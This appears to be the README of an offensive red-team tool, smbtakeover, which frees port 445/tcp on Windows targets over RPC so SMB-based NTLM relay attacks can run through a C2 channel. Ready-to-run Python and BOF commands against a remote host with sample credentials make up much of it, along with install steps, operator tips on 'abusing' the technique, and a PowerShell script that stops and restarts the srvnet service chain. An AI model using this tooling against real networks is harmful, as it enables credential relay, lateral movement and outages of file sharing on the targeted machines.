A technique to unbind and rebind 445/tcp on Windows without loading a driver, loading a module into LSASS, or rebooting the target machine. Implemented to ease the burden of SMB-based NTLM relays while operating over C2. The technique is discussed in more technical detail in the Relay Your Heart Away: An OPSEC-Conscious Approach to 445 Takeover presentation at x33fcon.
PoCs are provided in both Python and BOF format. Both use RPC over TCP (ncacn_ip_tcp) as the transport when targeting remote machines.
Please see the Operations Usage section of the associated blog post for an overview of considerations. The highlights include:
- Disabling these services effectively disables the target's ability to use named pipes and the server side of SMB-based communication (CIFS, etc.). Understand what the target machine is used for, especially if it is critical / production infrastructure. The services resume normal functionality once re-enabled.
- Occasionally a slightly different set of services needs to be disabled. I've seen this occur on some versions of Windows Server, as well as when certain third-party networking drivers are installed. This won't prevent you from using the technique: enumerate service dependencies backwards from srvnet and see if there are additional dependents to consider.
- You don't have to use this PoC to abuse this technique! Your favorite tool for interacting with the Service Control Manager (SCM) should work.
- Make sure you understand whether the tool of your choice uses ncacn_ip_tcp or ncacn_np as its RPC transport. If it uses the latter (named pipes, which ride over 445/tcp), stopping the services cuts off that channel and you won't be able to communicate remotely with the target to re-enable them.
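The dependency walk from the considerations above, as an added local example (this is not code from the smbtakeover project, and it is not how the PoCs implement the stop/start). It uses WMI's Win32_DependentService, which, unlike Get-Service, also covers kernel driver services such as srvnet, to compute the order in which the chain has to be stopped, then uses the local SCM via sc.exe to stop and restart it and checks whether anything still listens on 445/tcp. The function names, the 10-second wait and the use of sc.exe are this example's own choices. It has to run in an elevated PowerShell on the host itself.

```powershell
# Added example, not part of the smbtakeover project. Elevated PowerShell, run locally.

function Get-SrvnetStopOrder {
    param([string]$Root = 'srvnet')
    # Each Win32_DependentService row pairs an Antecedent (the service that is
    # depended on) with a Dependent (the service that requires it). Fetch once.
    $rows  = Get-CimInstance -ClassName Win32_DependentService
    $order = New-Object System.Collections.Generic.List[string]

    # Depth-first: dependents are added before the service they depend on,
    # because SCM refuses to stop a service while a running dependent is attached.
    function Visit([string]$Name) {
        foreach ($r in ($rows | Where-Object { $_.Antecedent.Name -eq $Name })) {
            if (-not $order.Contains($r.Dependent.Name)) { Visit $r.Dependent.Name }
        }
        if (-not $order.Contains($Name)) { $order.Add($Name) }
    }
    Visit $Root
    return ,$order   # typically LanmanServer, srv2, srvnet; extra dependents show up here
}

function Show-SrvnetChain {
    # Win32_BaseService covers both Win32 services and drivers, so srv2/srvnet appear.
    foreach ($name in Get-SrvnetStopOrder) {
        $svc = Get-CimInstance -ClassName Win32_BaseService -Filter "Name='$name'"
        [pscustomobject]@{ Name = $name; State = $svc.State; StartMode = $svc.StartMode; Type = $svc.ServiceType }
    }
}

function Wait-ServiceState {
    param([string]$Name, [string]$State, [int]$TimeoutSec = 10)
    # sc.exe stop/start return as soon as the request is accepted; poll until the
    # service actually reaches the requested state so the next step does not fail.
    $deadline = (Get-Date).AddSeconds($TimeoutSec)
    do {
        $cur = (Get-CimInstance -ClassName Win32_BaseService -Filter "Name='$Name'").State
        if ($cur -eq $State) { return $true }
        Start-Sleep -Milliseconds 250
    } while ((Get-Date) -lt $deadline)
    return $false
}

function Test-Smb445Listening {
    # 445/tcp is owned by the System process (PID 4) on behalf of srvnet; once
    # the chain is stopped the listener disappears and this returns $false.
    $l = Get-NetTCPConnection -LocalPort 445 -State Listen -ErrorAction SilentlyContinue
    return [bool]$l
}

function Stop-SrvnetChain {
    foreach ($name in Get-SrvnetStopOrder) {
        sc.exe stop $name | Out-Null            # already-stopped services just return error 1062
        if (-not (Wait-ServiceState -Name $name -State 'Stopped')) {
            throw "$name did not stop; check for dependents not in the computed order"
        }
    }
}

function Start-SrvnetChain {
    $order = Get-SrvnetStopOrder
    $order.Reverse()                            # srvnet first, LanmanServer last
    foreach ($name in $order) {
        sc.exe start $name | Out-Null
        if (-not (Wait-ServiceState -Name $name -State 'Running')) { throw "$name did not start" }
    }
}

# Usage:
#   Show-SrvnetChain            # what will be touched on this build
#   Stop-SrvnetChain; Test-Smb445Listening   # expect False once 445 is released
#   Start-SrvnetChain; Test-Smb445Listening  # expect True once srvnet is back
```

Two caveats: an unexpected entry in Show-SrvnetChain is exactly the "different set of services" case from the list above, so inspect the order before stopping anything on a production host; and this example only works locally, because `sc.exe \\target ...` talks to the remote SCM over the svcctl named pipe (ncacn_np over 445/tcp), which is the transport that the considerations warn cannot be used to turn the services back on remotely.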
Create a Python virtual environment and pip install impacket.
```
git clone https://github.com/zyn3rgy/smbtakeover.git
cd smbtakeover
python3 -m virtualenv venv
source venv/bin/activate
python3 -m pip install impacket
python3 smbtakeover.py -h
```
Python PoC usage (check the current state, unbind 445, then rebind it):
```
python3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 check
python3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 stop
python3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 start
```
BOF usage (same check / stop / start commands, against localhost or a remote host):
```
smbtakeover localhost check
smbtakeover 10.0.0.21 stop
smbtakeover localhost start
```
- Python implementation is heavily based on the wmiexec-Pro project by @Memory_before
- BOF implementation is heavily based on code within the CS-Remote-OPs-BOF repository, such as sc_config, from the great folks at @TrustedSec
- BOF makes use of the bof-vs template from Fortra